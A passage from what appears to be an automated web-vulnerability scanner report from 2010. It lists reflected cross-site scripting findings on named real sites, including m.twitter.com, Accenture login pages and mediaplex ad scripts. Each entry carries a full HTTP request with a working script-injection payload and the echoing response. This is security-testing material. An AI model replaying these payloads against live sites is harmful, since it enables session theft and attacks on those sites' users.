X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Tue, 21-Dec-2010 20:21:34 GMT; path=/; domain=digg.com
Set-Cookie: d=a4a09480f533f377242f4d345795ad8e3472286938e1ba81d5407416c04060a3; expires=Sat, 21-Nov-2020 06:29:14 GMT; path=/; domain=.digg.com
X-Digg-Time: D=465202 10.2.130.26
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15351

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00dc217"><script>alert(1)</script>304ac110a42.rss">
...[SNIP]...

1.106. http://ideabank.opendns.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ideabank.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e1f"><script>alert(1)</script>2b044539dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?89e1f"><script>alert(1)</script>2b044539dbc=1 HTTP/1.1
Host: ideabank.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=207386316.1290263893.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=http://opendns.com/; __utma=207386316.1945980142.1290263893.1290263893.1290263893.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104500


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="?page=2&amp;89e1f"><script>alert(1)</script>2b044539dbc=1">
...[SNIP]...

1.107. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be87"%3balert(1)//363c5691df7 was submitted in the mpck parameter. This input was echoed as 9be87";alert(1)//363c5691df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D4949634979be87"%3balert(1)//363c5691df7&mpt=494963497&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:51 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4081
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-114624-33380-1?mpt=4949634979be87";alert(1)//363c5691df7\" target=\"_blank\">
...[SNIP]...

1.108. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc9e4"%3balert(1)//be7622a1d03 was submitted in the mpvc parameter. This input was echoed as fc9e4";alert(1)//be7622a1d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&mpt=494963497&mpvc=fc9e4"%3balert(1)//be7622a1d03 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4057
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=fc9e4";alert(1)//be7622a1d03http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&clickTag=fc9e4";alert(1)//be7622a1d03http://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&clickT
...[SNIP]...

1.109. http://img.mediaplex.com/content/0/3992/techtips_388_redhead_160x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/techtips_388_redhead_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85d9"%3balert(1)//b20b8991dcf was submitted in the mpck parameter. This input was echoed as f85d9";alert(1)//b20b8991dcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072f85d9"%3balert(1)//b20b8991dcf&mpt=1151838072&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:54 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4084
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/3992-114624-33380-1?mpt=1151838072f85d9";alert(1)//b20b8991dcf\" target=\"_blank\">
...[SNIP]...

1.110. http://img.mediaplex.com/content/0/3992/techtips_388_redhead_160x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/techtips_388_redhead_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52fe"%3balert(1)//bb2e7f7b03d was submitted in the mpvc parameter. This input was echoed as b52fe";alert(1)//bb2e7f7b03d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&mpt=1151838072&mpvc=b52fe"%3balert(1)//bb2e7f7b03d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:01 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT
ETag: "4c57d5-b94-48a1927b79200"
Accept-Ranges: bytes
Content-Length: 4060
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=b52fe";alert(1)//bb2e7f7b03dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&clickTag=b52fe";alert(1)//bb2e7f7b03dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&clic
...[SNIP]...

1.111. http://jobs.hrkspjbs.com/js.ashx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.hrkspjbs.com
Path:   /js.ashx

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b3b'onerror%3d'alert(1)'651885c1226 was submitted in the loc parameter. This input was echoed as 97b3b'onerror='alert(1)'651885c1226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /js.ashx?pid=2B9C484E4C084CE1A90E33EB9CE8FE7B&tl=99337983945&did=a1254&loc=http%3A//www.xml.com/pub/a/2003/07/23/extendingrss.html%3F99584--%253E%253Cscript%253Ealert%281%29%253C/script%253E0a38ce97934%3D197b3b'onerror%3d'alert(1)'651885c1226&referer=http%3A//burp/show/23 HTTP/1.1
Host: jobs.hrkspjbs.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Nov 2010 01:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
HRDS: 281
Set-Cookie: hr=60d7d6c3f78c44f794606403cf69e5e9; expires=Fri, 21-Jan-2011 01:52:40 GMT; path=/
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 695

hr_208355='';
hr_208355+="<map name='directconnect208355'><area shape='rect' coords='0,0,189,195' href='http://jobserver.hirereach.net/Landingpage.aspx?jobid=a6690a3a84244a699f4d7eb4135afb4e&pid=2b9c4
...[SNIP]...
&jobid=a6690a3a84244a699f4d7eb4135afb4e&cid=60d7d6c3f78c44f794606403cf69e5e9&did=a1254&loc=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=197b3b'onerror='alert(1)'651885c1226' alt='' title='Matched by Hire Reach'/>
...[SNIP]...

1.112. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.twitter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f14"><script>alert(1)</script>79a7c4dda04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?13f14"><script>alert(1)</script>79a7c4dda04=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363133-22708-20320
ETag: "bfebd129371ab9808d57aa079c920990"
Last-Modified: Sun, 21 Nov 2010 18:12:13 GMT
X-Runtime: 0.00750
Content-Type: text/html; charset=utf-8
Content-Length: 707
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363133633094; path=/; expires=Sun, 28-Nov-10 18:12:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313363523026; path=/; expires=Tue, 21 Dec 2010 18:12:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=c64bc7b04b5bb45d5dba8e834c130207; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCMXeom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiVlNzlmYzkzN2ZhODBkMDE0OWJhNTJkMWQ5YzljM2ZlYSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--eac5f95bacd4fb9510431d61a1ac5fae4eea0f2b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><head>
<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location="http://mobile.twitter.com" + a.replac
...[SNIP]...
<meta http-equiv="refresh" content="0;url=http://mobile.twitter.com/?13f14"><script>alert(1)</script>79a7c4dda04=1">
...[SNIP]...

1.113. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.twitter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0be6"-alert(1)-"b367d71ddc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b0be6"-alert(1)-"b367d71ddc1=1 HTTP/1.1
Host: m.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 21 Nov 2010 18:12:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1290363138-1587-53133
ETag: "5a53462e51f159b5b02b0067f8e451fa"
Last-Modified: Sun, 21 Nov 2010 18:12:18 GMT
X-Runtime: 0.00681
Content-Type: text/html; charset=utf-8
Content-Length: 662
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=174.121.222.18.1290363138896016; path=/; expires=Sun, 28-Nov-10 18:12:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129036313889880210; path=/; expires=Tue, 21 Dec 2010 18:12:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: admobuu=11ab92267356f360020e6179577499a7; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCFTzom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiU1YWYzZDMyMzc4ZmE4NDQwMmYwM2NkZjhmZGMzMjYyMiIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--111c6193ffe736b7da547ec1fa7d08577e08217b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><head>
<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location="http://mobile.twitter.com" + a.replace(/^([^\/])/,"/$1");}else{g.location="http://mobile.twitter.com/?b0be6"-alert(1)-"b367d71ddc1=1"}})(window);
//]]>
...[SNIP]...

1.114. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://myoutlook.accenture.com
Path:   /cgi-bin/accenture.cfg/php/enduser/acct_login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 725e2--><script>alert(1)</script>a0bf1b06325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?725e2--><script>alert(1)</script>a0bf1b06325=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:20 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:20 GMT
RNT-Time: D=109449 t=1290359780465908
RNT-Machine: 10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32005

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
<head>
<meta name="robots" content="noindex,nofollo
...[SNIP]...
<input type="hidden" name="725e2--><script>alert(1)</script>a0bf1b06325" value="1" />
...[SNIP]...

1.115. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://myoutlook.accenture.com
Path:   /cgi-bin/accenture.cfg/php/enduser/acct_login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8138"><script>alert(1)</script>e61542efaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?c8138"><script>alert(1)</script>e61542efaa3=1 HTTP/1.1
Host: myoutlook.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:16:18 GMT
Server: Apache
P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:18 GMT
RNT-Time: D=169171 t=1290359778593827
RNT-Machine: 04
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32003

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
<head>
<meta name="robots" content="noindex,nofollo
...[SNIP]...
<input type="hidden" name="c8138"><script>alert(1)</script>e61542efaa3" value="1" />
...[SNIP]...

1.116. http://newsroom.accenture.com/article_display.cfm [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3851d</script><a>912587d3fc5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120606;expires=Tue, 13-Nov-2040 17:16:36 GMT;path=/
Set-Cookie: CFTOKEN=d57053a1f586da0a-6F6FF274-B002-47E4-BDA1C7AF62624BD5;expires=Tue, 13-Nov-2040 17:16:36 GMT;path=/
Set-Cookie: DARKSITE=0;expires=Sat, 21-Nov-2009 17:16:36 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.charSet="ISO-8859-1"
s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110"
s.channel="accenture/newsroom/pressreleases"
s.server="http://www.accenture.com"

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)doc
...[SNIP]...

1.117. http://newsroom.accenture.com/article_display.cfm [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newsroom.accenture.com
Path:   /article_display.cfm

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19d7</script><a>acbabcf8454 was submitted in the n parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454 HTTP/1.1
Host: newsroom.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:16:55 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=26120862;expires=Tue, 13-Nov-2040 17:16:55 GMT;path=/
